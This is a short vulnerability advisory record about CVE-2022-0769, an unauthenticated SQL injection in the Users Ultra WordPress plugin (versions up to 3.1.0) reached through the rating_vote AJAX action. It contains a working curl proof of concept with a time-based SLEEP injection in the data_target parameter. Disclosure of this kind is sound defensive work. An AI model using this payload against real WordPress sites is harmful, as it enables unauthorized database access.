Lucene search
CydaveWPVDB-ID:05EAB45D-EBE9-440F-B9C3-73EC40EF1141HistoryMar 29, 2022 - 12:00 a.m.
Users Ultra <= 3.1.0 - Unauthenticated SQL Injection
2022-03-2900:00:00
cydave
wpscan.com
14
users ultra plugin
unauthenticated
sql injection
ajax action
security vulnerability
EPSS
0.024
Percentile
89.9%
The plugin fails to properly sanitize and escape the data_target parameter before it is being interpolated in an SQL statement and then executed via the rating_vote AJAX action (available to both unauthenticated and authenticated users), leading to an SQL Injection.
PoC
curl https://example.com/wp-admin/admin-ajax.php --data ‘action=rating_vote&data;_id=1&data;_target=vote_score+%3d+1+AND+(SELECT+3+FROM+(SELECT(SLEEP(5)))gwe)–+’
Related
patchstack
patchstack
prion
prion
Sql injection
2022-04-25 16:16:00
nvd
nvd
CVE-2022-0769
2022-04-25 16:16:07
nuclei
nuclei
Users Ultra <= 3.1.0 - SQL Injection
2023-04-21 08:56:01
cvelist
cvelist
CVE-2022-0769 Users Ultra <= 3.1.0 - Unauthenticated SQL Injection
2022-04-25 15:51:08
wpexploit
wpexploit
Users Ultra <= 3.1.0 - Unauthenticated SQL Injection
2022-03-29 00:00:00
cve
cve
CVE-2022-0769
2022-04-25 16:16:07